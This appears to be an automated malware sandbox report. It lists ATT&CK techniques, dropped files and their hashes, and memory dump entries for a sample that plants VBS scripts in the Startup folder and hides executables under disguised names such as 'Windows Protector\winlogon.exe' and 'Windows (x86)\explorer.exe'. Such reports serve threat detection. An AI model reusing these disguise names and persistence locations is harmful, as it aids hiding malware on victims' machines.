Execution

Persistence

Hidden Files and Directories

T1158

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Hidden Files and Directories

T1158

Modify Registry

T1112

Web Service

T1102

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

Filesize
1KB

MD5
d94de84fd13a9a2a0f149fc2345b86fa

SHA1
a33cbf048dd9093095a005b27127233c43f76a6c

SHA256
b67d26b491cc6a8e2930701d99516b3f6ed83223194d830573dbfdae3808299d

SHA512
3fda5b67dc46ff423493a379db1a682b87cb9430005e171ecb68b5893a80ba0026bcb9ade2f71a085a93f94fd43943da171a56302e2feb719756a0eaabcf28b8

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\9E610D72817F59FAB1BFA75BAAB7746D

Filesize
132B

MD5
cc9ff4010b7de68a7328981e59618920

SHA1
d709369490a2544d620ba0df857dadd0bb0d791c

SHA256
b833c8c8433ea9967887502359228be622959ff2e5cf7286112d7a15b7b7eb24

SHA512
e6053527ee46b281a43571519d46cf20f7909bf9f71097fda3489fdfd501f9928f3e3e4394673d91f3260d6fb4d906eb226fc7f87d5e279deb6af5ee140ae573

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

Filesize
408B

MD5
cf6c161481475c9928d2ec458649c6e9

SHA1
506919876d823ae54b43595db346282aeff6dab0

SHA256
9f93fd376af96582f2601e21bd57333e8b3eca648eef2a0d7f58126058ab9e7a

SHA512
ba22c499632c688c3a99165c6cf09b041725efa8085b831e7107c67370ca74ccc4dee227b853e2ab1bf03aadf469e7f5152796929edd51810623924d906b72ac

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
340B

MD5
cea288f82d82fc00af16dd87a2923347

SHA1
761c3db57aca8fa4432b15df44e9fa68cf9e79bf

SHA256
ea2736f52a74d486ea4a343f4ef635c769fa7e2e6f6ddb1bef7e1a101d954d34

SHA512
f2f3bb0f75c3c59f14152bc7c853b4744dd3c53ab596ed41205971d25e9877537a1cf4d37e14f71599069f56160f324b1567f534cd3ec664f63b944fcf20d307

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9E610D72817F59FAB1BFA75BAAB7746D

Filesize
184B

MD5
3d99c7c91af5b90d9fd0c09e1d8c2244

SHA1
7d8f742d10a82ad96b571a4943db282909051cff

SHA256
26730de6397b8f3dd86a149c1503e37b4129e7e838c9b946d473df94bcff652d

SHA512
4136750d28cbd6f38366fa82ada05175f458cfd55017f52e6d2c05abd5092028d9f6082387f5ec9550761097b1dec7f98c4e740fc28e17964f04e0345e689f50

Download Submit
C:\Users\Admin\AppData\Local\Temp\2FA9.tmp\2FBA.bat

Filesize
13KB

MD5
b8d37d42c7b70fb63c19f741c3a23d63

SHA1
62c43ac9efa8f3abb6a3a1f529076ef5d3ae37d9

SHA256
6822b2a4a79cf09c86263d7464abc7ccf375dd37ba5ff5503f3c4f1c9fad8188

SHA512
800bc7db00e77a6f563a9f036c45b3a91eb07831080903da043c00cd5d76cd0528a79458365f4077020830515a3b23689e751e9bed940738c3221a93f491d19e

Download Submit
C:\Users\Admin\AppData\Local\Temp\F651.tmp\F652.bat

Filesize
13KB

MD5
6d37a766ec204ef499738c03beb212fb

SHA1
295fdd98a838a5be50c9d3ff6052b27d25d3a231

SHA256
7043b19cd4b5d5087ff95dc07f816099bad634c28f34e3e904c1d4efca222ab9

SHA512
606c799fc9535767b241a9ab81fd9194f566f454d66110454fc9f10a2e511dc1bd2cf86121e6a7a0ada09bdac2c4110c3d9621ae7cb5c35f30ab0bda63781c5f

Download Submit
C:\Users\Admin\AppData\Local\Temp\IE.exe

Filesize
772KB

MD5
7ed5b2dec02ef2ddc967fa9ca0dd8d2f

SHA1
0f471be520c5c78a0a40a4026237e04c366a3110

SHA256
c787c9a5f407a656478efc835f1a0f8f738030bf26cedbd4748cb7b18ed2ea3e

SHA512
9e8df81da00ccd9345bf3dfa2f01906830ca718875c0e535498eed6a73db62a1ec3149ea611d1f60c1c144a86d6f94482b985a9e7dbdd23b5d8f1b43e347f09e

Download Submit
C:\Users\Admin\AppData\Local\Temp\IE.exe

Filesize
772KB

MD5
7ed5b2dec02ef2ddc967fa9ca0dd8d2f

SHA1
0f471be520c5c78a0a40a4026237e04c366a3110

SHA256
c787c9a5f407a656478efc835f1a0f8f738030bf26cedbd4748cb7b18ed2ea3e

SHA512
9e8df81da00ccd9345bf3dfa2f01906830ca718875c0e535498eed6a73db62a1ec3149ea611d1f60c1c144a86d6f94482b985a9e7dbdd23b5d8f1b43e347f09e

Download Submit
C:\Users\Admin\AppData\Local\Temp\VERIU.BAT

Filesize
132B

MD5
cc9ff4010b7de68a7328981e59618920

SHA1
d709369490a2544d620ba0df857dadd0bb0d791c

SHA256
b833c8c8433ea9967887502359228be622959ff2e5cf7286112d7a15b7b7eb24

SHA512
e6053527ee46b281a43571519d46cf20f7909bf9f71097fda3489fdfd501f9928f3e3e4394673d91f3260d6fb4d906eb226fc7f87d5e279deb6af5ee140ae573

Download Submit
C:\Users\Admin\AppData\Local\Temp\VERIU.BAT

Filesize
132B

MD5
cc9ff4010b7de68a7328981e59618920

SHA1
d709369490a2544d620ba0df857dadd0bb0d791c

SHA256
b833c8c8433ea9967887502359228be622959ff2e5cf7286112d7a15b7b7eb24

SHA512
e6053527ee46b281a43571519d46cf20f7909bf9f71097fda3489fdfd501f9928f3e3e4394673d91f3260d6fb4d906eb226fc7f87d5e279deb6af5ee140ae573

Download Submit
C:\Users\Admin\AppData\Local\Temp\dd_vcredist_windows_check_31029441313.log

Filesize
6B

MD5
39467f43fe19dca3f9f600c880ee3924

SHA1
fc74af7f760b13cd00e49b928d09ef8ca23cc7bb

SHA256
520da264acd1f442c6449a505dfeb29e756efb70eb4ec046c44c4ef5c18ab5de

SHA512
0b68473223437088fda5131d3267e316cfe07a272914921cbfdee10bc374e22851455fe06c8cb8f2aaccf06cb5c41992394f45e9dc6bfa6389be78d9cc901df3

Download Submit
C:\Users\Admin\AppData\Local\Temp\updateW\64a1.com

Filesize
2.1MB

MD5
ed2c8bb4eff7a646b544da1dfae70e05

SHA1
f51e52aa2ae2cc74997b567bf9ce84d9eb351a79

SHA256
498bb94d257bbbf5a1b039c8168f5ce86e9b7fabc089cb6509b726ed5b557563

SHA512
86c3552aa223d8fd06c87d0075021e4a83e8e77199ad1e6538ce6052cb8e9ceaffbe074515c92c2842da25d478c33164f7a73d5015932f407f1c104749dcef71

Download Submit
C:\Users\Admin\AppData\Local\Temp\updateW\64a1.com

Filesize
2.1MB

MD5
ed2c8bb4eff7a646b544da1dfae70e05

SHA1
f51e52aa2ae2cc74997b567bf9ce84d9eb351a79

SHA256
498bb94d257bbbf5a1b039c8168f5ce86e9b7fabc089cb6509b726ed5b557563

SHA512
86c3552aa223d8fd06c87d0075021e4a83e8e77199ad1e6538ce6052cb8e9ceaffbe074515c92c2842da25d478c33164f7a73d5015932f407f1c104749dcef71

Download Submit
C:\Users\Admin\AppData\Local\Temp\updateW\Microsoft.exe

Filesize
63KB

MD5
a5b1e5ca923df2568e09456390ff0ad8

SHA1
03b39ecd7d246a521fafd210d6be548fd1d337fd

SHA256
2246f52abfa3e125b7eb5831b40130fb1d4b6b2a274fef9b3b7aa854487b70a3

SHA512
7c286de35fd8899a2a43791e8a50436362a12f78b2582dcb72c75470a7ea50e3788d8ce4846de825501e929cf9a2e4ece4cd5d75f2627cd6ccf78cd91c2a885c

Download Submit
C:\Users\Admin\AppData\Local\Temp\updateW\clsio.vbs

Filesize
234B

MD5
caae280b7c78aec4498570641eaf8404

SHA1
d65ff2358e8474f425f47fb31ad5e6124035892c

SHA256
1ee8a39cf1c638888b16cbf590f97994d3565082fdf9446f3fde3e720e2a3665

SHA512
a847b1ed2f578bd1bcfafbcdcb65acc36d4e12341c83e58f310b3a85db67dfa38336ff4b543a0cda0223e4ed93e77ebb2ab843f34550f71739730b3b01645768

Download Submit
C:\Users\Admin\AppData\Local\Temp\updateW\irom.com

Filesize
323KB

MD5
c28f5884742601af68f6254e1b1372b9

SHA1
ab7472a2f56fca9f7f6e7519dea98eb06538e1ae

SHA256
1fbecefc4ef848e7c9ebd924c6fc11ffefdb0fa3bc87198b5062df09ab2faa1a

SHA512
e2ea63226b2cdc4273c46591b600775503c2d927f6b7892a7f983692e0568eb500c5c278c17129c72a7c6195f63116c11428e5537d04b6878f1398906bdf33d5

Download Submit
C:\Users\Admin\AppData\Local\Temp\updateW\irom.com

Filesize
323KB

MD5
c28f5884742601af68f6254e1b1372b9

SHA1
ab7472a2f56fca9f7f6e7519dea98eb06538e1ae

SHA256
1fbecefc4ef848e7c9ebd924c6fc11ffefdb0fa3bc87198b5062df09ab2faa1a

SHA512
e2ea63226b2cdc4273c46591b600775503c2d927f6b7892a7f983692e0568eb500c5c278c17129c72a7c6195f63116c11428e5537d04b6878f1398906bdf33d5

Download Submit
C:\Users\Admin\AppData\Local\Temp\updateW\lirb.com

Filesize
327KB

MD5
96314747c1f52485836c7eda570aa6e2

SHA1
98690473cd1e3740debc66322e1586fce1b228b0

SHA256
601bc48b0e84678055ae18a99d4e70f58373c436bd8b3c6669d4ba53a01d0ffc

SHA512
eb636c9537f3d13f2fc54565334655262d15a063c220eae1b2dceed093e7f8da282bd206d9dba5243be0cf51886db948c91d5529148c0041d94c30a934ae5389

Download Submit
C:\Users\Admin\AppData\Local\Temp\updateW\lirb.com

Filesize
327KB

MD5
96314747c1f52485836c7eda570aa6e2

SHA1
98690473cd1e3740debc66322e1586fce1b228b0

SHA256
601bc48b0e84678055ae18a99d4e70f58373c436bd8b3c6669d4ba53a01d0ffc

SHA512
eb636c9537f3d13f2fc54565334655262d15a063c220eae1b2dceed093e7f8da282bd206d9dba5243be0cf51886db948c91d5529148c0041d94c30a934ae5389

Download Submit
C:\Users\Admin\AppData\Local\Temp\updateW\rd.bat

Filesize
123B

MD5
a6d5b3d796a2033e57b6dc55d30d9246

SHA1
85af7f82a3795d0680b9edf4193772dac6fa46a9

SHA256
6faaa1b6ba75e9488cf1e80ad60570dc2c5a695f661a52e6d382f2906270d63f

SHA512
92df7ae891b075ace859c4e1f7300db15a2f52622e0c4b640cc590f71c600177cb3a834855a1e6b828d780fb31e4fc5f42962cd0b24df59c671f85e313bc9544

Download Submit
C:\Users\Admin\AppData\Local\Temp\updateW\win.com

Filesize
2.0MB

MD5
93f47f76917294e7c1fc11ba690f12d7

SHA1
9895db1213530dac6b90ce61fdcd24020dea83a8

SHA256
a0b16cc5fe93ac5c9c05d0de92cbfa97aaaceefbac036058677f60ee988804a6

SHA512
6e87151dc48a9e9ac21fec5f486a74dac8f695bdc95fe00c801e999f523800b0045c0dd219ba5e5ce75f768e654c35dcc5eae56898b4d8a3738941a69b797199

Download Submit
C:\Users\Admin\AppData\Local\Temp\updateW\win.com

Filesize
2.0MB

MD5
93f47f76917294e7c1fc11ba690f12d7

SHA1
9895db1213530dac6b90ce61fdcd24020dea83a8

SHA256
a0b16cc5fe93ac5c9c05d0de92cbfa97aaaceefbac036058677f60ee988804a6

SHA512
6e87151dc48a9e9ac21fec5f486a74dac8f695bdc95fe00c801e999f523800b0045c0dd219ba5e5ce75f768e654c35dcc5eae56898b4d8a3738941a69b797199

Download Submit
C:\Users\Admin\AppData\Local\Temp\updateW\windowsapp.exe

Filesize
37KB

MD5
379528dce8b0f2cc61ff99a3df2a9928

SHA1
58f6e48e29cea7de9abd7ae5b7c99abdaa2412e2

SHA256
874fa85adde3cc5b3cd0d7d932e28a0ec2a53d3b5566c8160772bde6d092c141

SHA512
b7a0b90ed1163cb1bbd63ae2e4c6ea576d81286b307b3c11beb20ab1f8427a4da81b05a9c8da9b7af067d74f9af973549bc601bb07161538404425af4dffe940

Download Submit
C:\Users\Admin\AppData\Local\Temp\updateW\windowsapp.exe

Filesize
37KB

MD5
379528dce8b0f2cc61ff99a3df2a9928

SHA1
58f6e48e29cea7de9abd7ae5b7c99abdaa2412e2

SHA256
874fa85adde3cc5b3cd0d7d932e28a0ec2a53d3b5566c8160772bde6d092c141

SHA512
b7a0b90ed1163cb1bbd63ae2e4c6ea576d81286b307b3c11beb20ab1f8427a4da81b05a9c8da9b7af067d74f9af973549bc601bb07161538404425af4dffe940

Download Submit
C:\Users\Admin\AppData\Local\Temp\updateW\winupdate.exe

Filesize
47KB

MD5
eb9e4955edda276425933aea122f9a84

SHA1
6763106ffdc12cf213f579f72c1c6e8f3272fa9c

SHA256
75180613894eb3345319cc207d66688e5219035a05e97d330a2397d51cc397c6

SHA512
621cb956531c7e70715cb14eb3b5ff030fa1b3387a97b7ef04a847bdb54878ad713162115c78ce46dca3d3f11b5742a23e8a1fecd34e30429e934c487aafa60f

Download Submit
C:\Users\Admin\AppData\Local\Temp\windowscheck_182352115_log.bat

Filesize
6KB

MD5
403d5dccab92622dd3d2bc70a95b2453

SHA1
e4cd9c7bf4493ba1f9184f3c3f46882931b891d9

SHA256
69728a0d54a5d95fb4693efac6f3873d22a2faa98a5b86cabc3a9e38675180f6

SHA512
9baf08ac4e0f104bbb8d1dddbf6dcddc728f044af8597ac4a2c6038c70ccf4ea79376a736737a5117b0aa85a01c04904da0e31843ca3d0e7eeb01c345cfe24e6

Download Submit
C:\Users\Admin\AppData\Roaming\AppData\Flash Player\backup.vbs

Filesize
46KB

MD5
303b4e8b3434cc3377f3e2b6fb8d157a

SHA1
4fb5a2a44df5d4bf01693881040dc5117eadedab

SHA256
f8e9d58f0eb6b1d398dc4532966ff7686956111f465a0777effc9b435ff0b4c5

SHA512
8e9c9c61f03dc3d62026923a75626bf70390453b2d58c43e22fab6a240676ab0cd7bd6268407256bb974baac20786e9529d01388d8faebbb520a26ec6f586e21

Download Submit
C:\Users\Admin\AppData\Roaming\AppData\Flash Player\main.vbs

Filesize
43KB

MD5
dc64f4006ac8da132aac23cee3e22332

SHA1
f7ff2b567c1f5d76937d6cf6b6b45dcbeac3b393

SHA256
7b8b5acc0e36cde3a00177395f234b588b96ecb89e3c317d7e703c995463050f

SHA512
538c04d3b80a9beefc1f3b666ba705d34a85f8e52c91c4f3abf44a1d0101cbde0a4645c21bda4c02ef6a0d0355f0f1c38469a3600280c6bdfb614fb8365c3552

Download Submit
C:\Users\Admin\AppData\Roaming\AppData\Windows Protector\winlogon.exe

Filesize
30KB

MD5
81b88e00b20c4fc25b4cc37c76183d25

SHA1
e49c1133657c6a37699e4a88702169218f0cb209

SHA256
267f30410791f5bb1b942a33daa6a66337758283c2f0710331be9430a380fd63

SHA512
055400816e0a29f45c80a6f5f5183a49985d9a9718e921967de85870f04e851372e96a51d630e47052c5046d5e17841eecba4e560ed72eeefb0ec75c09074e24

Download Submit
C:\Users\Admin\AppData\Roaming\AppData\Windows Protector\winlogon.exe

Filesize
30KB

MD5
81b88e00b20c4fc25b4cc37c76183d25

SHA1
e49c1133657c6a37699e4a88702169218f0cb209

SHA256
267f30410791f5bb1b942a33daa6a66337758283c2f0710331be9430a380fd63

SHA512
055400816e0a29f45c80a6f5f5183a49985d9a9718e921967de85870f04e851372e96a51d630e47052c5046d5e17841eecba4e560ed72eeefb0ec75c09074e24

Download Submit
C:\Users\Admin\AppData\Roaming\AppData\Windows Updates\winupdate.exe

Filesize
47KB

MD5
eb9e4955edda276425933aea122f9a84

SHA1
6763106ffdc12cf213f579f72c1c6e8f3272fa9c

SHA256
75180613894eb3345319cc207d66688e5219035a05e97d330a2397d51cc397c6

SHA512
621cb956531c7e70715cb14eb3b5ff030fa1b3387a97b7ef04a847bdb54878ad713162115c78ce46dca3d3f11b5742a23e8a1fecd34e30429e934c487aafa60f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\backup.vbs

Filesize
46KB

MD5
303b4e8b3434cc3377f3e2b6fb8d157a

SHA1
4fb5a2a44df5d4bf01693881040dc5117eadedab

SHA256
f8e9d58f0eb6b1d398dc4532966ff7686956111f465a0777effc9b435ff0b4c5

SHA512
8e9c9c61f03dc3d62026923a75626bf70390453b2d58c43e22fab6a240676ab0cd7bd6268407256bb974baac20786e9529d01388d8faebbb520a26ec6f586e21

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\main.vbs

Filesize
43KB

MD5
dc64f4006ac8da132aac23cee3e22332

SHA1
f7ff2b567c1f5d76937d6cf6b6b45dcbeac3b393

SHA256
7b8b5acc0e36cde3a00177395f234b588b96ecb89e3c317d7e703c995463050f

SHA512
538c04d3b80a9beefc1f3b666ba705d34a85f8e52c91c4f3abf44a1d0101cbde0a4645c21bda4c02ef6a0d0355f0f1c38469a3600280c6bdfb614fb8365c3552

Download Submit
C:\Windows (x86)\1xs.txt

Filesize
1KB

MD5
4bef77593548c8ffbe1032d1e19fdbe1

SHA1
396ed9957651cd175dfe1a07274fcf97b8498c7b

SHA256
19c089eef95773db053e4296baa918ed3a4e98fed7ec96ea5dd796bf95b5f4c6

SHA512
661769875578c3e498b526f0541b6ab4f52d87b49e0b0688ac65b3c44f2bdf929bf810c0187c8cc39ab9a004d3e985dc0120f12c07e8cd646beedba93ea93546

Download Submit
C:\Windows (x86)\3xs.txt

Filesize
938B

MD5
d80386f87dd89d45b52e57309bb3d967

SHA1
4b5df6a75c30a66d153b021518383d9e78d85c96

SHA256
0cb8999b0ac329d2f18a50a25344c8075f7e2eb472292f04bc099afef90166aa

SHA512
7fe22bc10555f6db611248418d04d47805970f04bddc05f6e40ab98a02b6f238292cf746ca1b48f575d5c511e5adaece68110d167bccc91aadda41772fe80096

Download Submit
C:\Windows (x86)\WinRing0x64.sys

Filesize
14KB

MD5
0c0195c48b6b8582fa6f6373032118da

SHA1
d25340ae8e92a6d29f599fef426a2bc1b5217299

SHA256
11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5

SHA512
ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d

Download Submit
C:\Windows (x86)\aarun.vbs

Filesize
115B

MD5
29a3502c721319b896b4cf7aae0aaec5

SHA1
de94cfb0214c0deddfbea191598bac33dce53bb9

SHA256
a84a10c5ca727e766a5c25cf6f6f42b3dc3fd8760a5c8a755b77e1404c84b7a0

SHA512
7e791091dac79af2feb151e077ed5e991faec214ff6f857afbf882e2664fc26f044e49b218b422459e7319b1d899ad397be5b8ab9f0d036765a48cf461560cc8

Download Submit
C:\Windows (x86)\cert.pem

Filesize
964B

MD5
8cf81e9a5c77b6e6d1e5a559b31f39b3

SHA1
c98dcef2c0e2187542e91827d25bc5ad970eadd5

SHA256
8d5afc7f5983d47fc49030ff5c9a4b7b4e228d9611571723e026efc5025566a8

SHA512
e89a750bb5fb25c7eef51f1289256c9f9f2fff627afc0520f619f070273f3c988942fb231308bad6dac6e0b7380b3000e7063ec2eae67b39ebf6fd22209d97fb

Download Submit
C:\Windows (x86)\cert_key.pem

Filesize
1KB

MD5
c836cb8b91f50a6dbd17945e6e3f54b0

SHA1
d7341e5c6c62b7418a6643938e54d81f5be31b48

SHA256
05bfd415cbb17480a71a970c4e2dee2a656900621f4d89de6f5180689d4df75a

SHA512
01e832e7bfad0c35084eba2aad45282666c81aa9236eecccac22b9b405d01694d07389272127616b20ed29393c76f38de03d1a437e060a52e6e1124c38417e52

Download Submit
C:\Windows (x86)\config.json

Filesize
2KB

MD5
6d0969ef7248957a497ef4669b63d6d1

SHA1
eda2678e0d4a80d0c57f51f006accb8e5dc75889

SHA256
29275f98e09f708483f0f87d3c9a502c5043f7c371046f58edd141a6e5e970ad

SHA512
72cbaefb6c2ea5642df7c2df9a2993fd25fb5cd72d1844f1ca37db6f0427c78bc0ff182085c9c9e5509733d8f7e52b71d5ad7c291259eae558006d2ea1af4144

Download Submit
C:\Windows (x86)\explorer.exe

Filesize
5.1MB

MD5
aa29dd540139be90fe02be76c6893534

SHA1
333faca54fc888198373cf5572df0ff092e38c9f

SHA256
3a8c7883f0f6bbd03c33ad762c232d84f92891930490c9d23b9556b90700d150

SHA512
a88a5e272aa461d8a31a7cd831b74af2a7bba3c2e02b2ee1429f52069a0e25ca45bf576d490d8440deb81efe461693506742502efc94acc428740adf68ca4188

Download Submit
C:\Windows (x86)\explorer.exe

Filesize
5.1MB

MD5
aa29dd540139be90fe02be76c6893534

SHA1
333faca54fc888198373cf5572df0ff092e38c9f

SHA256
3a8c7883f0f6bbd03c33ad762c232d84f92891930490c9d23b9556b90700d150

SHA512
a88a5e272aa461d8a31a7cd831b74af2a7bba3c2e02b2ee1429f52069a0e25ca45bf576d490d8440deb81efe461693506742502efc94acc428740adf68ca4188

Download Submit
C:\Windows (x86)\explorer.exe

Filesize
5.1MB

MD5
aa29dd540139be90fe02be76c6893534

SHA1
333faca54fc888198373cf5572df0ff092e38c9f

SHA256
3a8c7883f0f6bbd03c33ad762c232d84f92891930490c9d23b9556b90700d150

SHA512
a88a5e272aa461d8a31a7cd831b74af2a7bba3c2e02b2ee1429f52069a0e25ca45bf576d490d8440deb81efe461693506742502efc94acc428740adf68ca4188

Download Submit
C:\Windows (x86)\xagal.bat

Filesize
759B

MD5
104470f3c1211668407c2519f44862f9

SHA1
58054e1f3ef8e70210fe362dd491a65231494fcb

SHA256
cd2c3436284a9e2e6505a01d73edad527e3094a7c7efc7890d476638924ed2bf

SHA512
aa1575f35d252f0a0c19599d87cd44483c3468873cd9f141e22214f22d9b321d227d9a3b027b923ea2a931896f5f7811eabf8f7ff2e7a9d869010049888848d7

Download Submit
\Users\Admin\AppData\Local\Temp\updateW\windowsapp.exe

Filesize
37KB

MD5
379528dce8b0f2cc61ff99a3df2a9928

SHA1
58f6e48e29cea7de9abd7ae5b7c99abdaa2412e2

SHA256
874fa85adde3cc5b3cd0d7d932e28a0ec2a53d3b5566c8160772bde6d092c141

SHA512
b7a0b90ed1163cb1bbd63ae2e4c6ea576d81286b307b3c11beb20ab1f8427a4da81b05a9c8da9b7af067d74f9af973549bc601bb07161538404425af4dffe940

Download Submit
\Users\Admin\AppData\Local\Temp\updateW\windowsapp.exe

Filesize
37KB

MD5
379528dce8b0f2cc61ff99a3df2a9928

SHA1
58f6e48e29cea7de9abd7ae5b7c99abdaa2412e2

SHA256
874fa85adde3cc5b3cd0d7d932e28a0ec2a53d3b5566c8160772bde6d092c141

SHA512
b7a0b90ed1163cb1bbd63ae2e4c6ea576d81286b307b3c11beb20ab1f8427a4da81b05a9c8da9b7af067d74f9af973549bc601bb07161538404425af4dffe940

Download Submit
\Users\Admin\AppData\Local\Temp\updateW\windowsapp.exe

Filesize
37KB

MD5
379528dce8b0f2cc61ff99a3df2a9928

SHA1
58f6e48e29cea7de9abd7ae5b7c99abdaa2412e2

SHA256
874fa85adde3cc5b3cd0d7d932e28a0ec2a53d3b5566c8160772bde6d092c141

SHA512
b7a0b90ed1163cb1bbd63ae2e4c6ea576d81286b307b3c11beb20ab1f8427a4da81b05a9c8da9b7af067d74f9af973549bc601bb07161538404425af4dffe940

Download Submit
\Users\Admin\AppData\Local\Temp\updateW\windowsapp.exe

Filesize
37KB

MD5
379528dce8b0f2cc61ff99a3df2a9928

SHA1
58f6e48e29cea7de9abd7ae5b7c99abdaa2412e2

SHA256
874fa85adde3cc5b3cd0d7d932e28a0ec2a53d3b5566c8160772bde6d092c141

SHA512
b7a0b90ed1163cb1bbd63ae2e4c6ea576d81286b307b3c11beb20ab1f8427a4da81b05a9c8da9b7af067d74f9af973549bc601bb07161538404425af4dffe940

Download Submit
\Users\Admin\AppData\Roaming\AppData\Windows Protector\winlogon.exe

Filesize
30KB

MD5
81b88e00b20c4fc25b4cc37c76183d25

SHA1
e49c1133657c6a37699e4a88702169218f0cb209

SHA256
267f30410791f5bb1b942a33daa6a66337758283c2f0710331be9430a380fd63

SHA512
055400816e0a29f45c80a6f5f5183a49985d9a9718e921967de85870f04e851372e96a51d630e47052c5046d5e17841eecba4e560ed72eeefb0ec75c09074e24

Download Submit
\Users\Admin\AppData\Roaming\AppData\Windows Protector\winlogon.exe

Filesize
30KB

MD5
81b88e00b20c4fc25b4cc37c76183d25

SHA1
e49c1133657c6a37699e4a88702169218f0cb209

SHA256
267f30410791f5bb1b942a33daa6a66337758283c2f0710331be9430a380fd63

SHA512
055400816e0a29f45c80a6f5f5183a49985d9a9718e921967de85870f04e851372e96a51d630e47052c5046d5e17841eecba4e560ed72eeefb0ec75c09074e24

Download Submit
\Users\Admin\AppData\Roaming\AppData\Windows Protector\winlogon.exe

Filesize
30KB

MD5
81b88e00b20c4fc25b4cc37c76183d25

SHA1
e49c1133657c6a37699e4a88702169218f0cb209

SHA256
267f30410791f5bb1b942a33daa6a66337758283c2f0710331be9430a380fd63

SHA512
055400816e0a29f45c80a6f5f5183a49985d9a9718e921967de85870f04e851372e96a51d630e47052c5046d5e17841eecba4e560ed72eeefb0ec75c09074e24

Download Submit
\Users\Admin\AppData\Roaming\AppData\Windows Protector\winlogon.exe

Filesize
30KB

MD5
81b88e00b20c4fc25b4cc37c76183d25

SHA1
e49c1133657c6a37699e4a88702169218f0cb209

SHA256
267f30410791f5bb1b942a33daa6a66337758283c2f0710331be9430a380fd63

SHA512
055400816e0a29f45c80a6f5f5183a49985d9a9718e921967de85870f04e851372e96a51d630e47052c5046d5e17841eecba4e560ed72eeefb0ec75c09074e24

Download Submit
\Users\Admin\AppData\Roaming\AppData\Windows Protector\winlogon.exe

Filesize
30KB

MD5
81b88e00b20c4fc25b4cc37c76183d25

SHA1
e49c1133657c6a37699e4a88702169218f0cb209

SHA256
267f30410791f5bb1b942a33daa6a66337758283c2f0710331be9430a380fd63

SHA512
055400816e0a29f45c80a6f5f5183a49985d9a9718e921967de85870f04e851372e96a51d630e47052c5046d5e17841eecba4e560ed72eeefb0ec75c09074e24

Download Submit
\Windows (x86)\explorer.exe

Filesize
5.1MB

MD5
aa29dd540139be90fe02be76c6893534

SHA1
333faca54fc888198373cf5572df0ff092e38c9f

SHA256
3a8c7883f0f6bbd03c33ad762c232d84f92891930490c9d23b9556b90700d150

SHA512
a88a5e272aa461d8a31a7cd831b74af2a7bba3c2e02b2ee1429f52069a0e25ca45bf576d490d8440deb81efe461693506742502efc94acc428740adf68ca4188

Download Submit
\Windows (x86)\explorer.exe

Filesize
5.1MB

MD5
aa29dd540139be90fe02be76c6893534

SHA1
333faca54fc888198373cf5572df0ff092e38c9f

SHA256
3a8c7883f0f6bbd03c33ad762c232d84f92891930490c9d23b9556b90700d150

SHA512
a88a5e272aa461d8a31a7cd831b74af2a7bba3c2e02b2ee1429f52069a0e25ca45bf576d490d8440deb81efe461693506742502efc94acc428740adf68ca4188

Download Submit
memory/296-148-0x0000000000000000-mapping.dmp

Download
memory/468-103-0x0000000000000000-mapping.dmp

Download
memory/536-80-0x0000000000000000-mapping.dmp

Download
memory/536-83-0x0000000075CF1000-0x0000000075CF3000-memory.dmp

Filesize
8KB

Download
memory/560-190-0x0000000000000000-mapping.dmp

Download
memory/568-159-0x0000000000000000-mapping.dmp

Download
memory/616-57-0x0000000000000000-mapping.dmp

Download
memory/616-58-0x00000000FF021000-0x00000000FF023000-memory.dmp

Filesize
8KB

Download
memory/684-160-0x0000000000000000-mapping.dmp

Download
memory/684-82-0x0000000000000000-mapping.dmp

Download
memory/764-100-0x0000000000000000-mapping.dmp

Download
memory/852-63-0x0000000000000000-mapping.dmp

Download
memory/860-74-0x0000000000000000-mapping.dmp

Download
memory/864-154-0x0000000000000000-mapping.dmp

Download
memory/924-99-0x0000000000000000-mapping.dmp

Download
memory/924-156-0x0000000000000000-mapping.dmp

Download
memory/956-67-0x0000000000000000-mapping.dmp

Download
memory/988-89-0x0000000000000000-mapping.dmp

Download
memory/988-206-0x0000000000400000-0x0000000000419000-memory.dmp

Filesize
100KB

Download
memory/988-114-0x0000000000400000-0x0000000000419000-memory.dmp

Filesize
100KB

Download
memory/1084-76-0x0000000000000000-mapping.dmp

Download
memory/1084-141-0x0000000000000000-mapping.dmp

Download
memory/1084-77-0x00000000FFE21000-0x00000000FFE23000-memory.dmp

Filesize
8KB

Download
memory/1084-113-0x0000000000000000-mapping.dmp

Download
memory/1092-125-0x0000000000000000-mapping.dmp

Download
memory/1144-128-0x0000000000000000-mapping.dmp

Download
memory/1148-120-0x0000000000000000-mapping.dmp

Download
memory/1164-146-0x0000000000000000-mapping.dmp

Download
memory/1192-98-0x0000000000000000-mapping.dmp

Download
memory/1196-139-0x0000000000000000-mapping.dmp

Download
memory/1224-65-0x0000000000000000-mapping.dmp

Download
memory/1248-142-0x0000000000000000-mapping.dmp

Download
memory/1352-92-0x0000000000000000-mapping.dmp

Download
memory/1364-116-0x0000000000000000-mapping.dmp

Download
memory/1380-115-0x0000000000000000-mapping.dmp

Download
memory/1408-104-0x0000000000000000-mapping.dmp

Download
memory/1520-118-0x0000000000000000-mapping.dmp

Download
memory/1520-55-0x0000000000000000-mapping.dmp

Download
memory/1532-61-0x0000000000000000-mapping.dmp

Download
memory/1532-161-0x0000000000000000-mapping.dmp

Download
memory/1536-162-0x0000000000000000-mapping.dmp

Download
memory/1536-163-0x00000000FF101000-0x00000000FF103000-memory.dmp

Filesize
8KB

Download
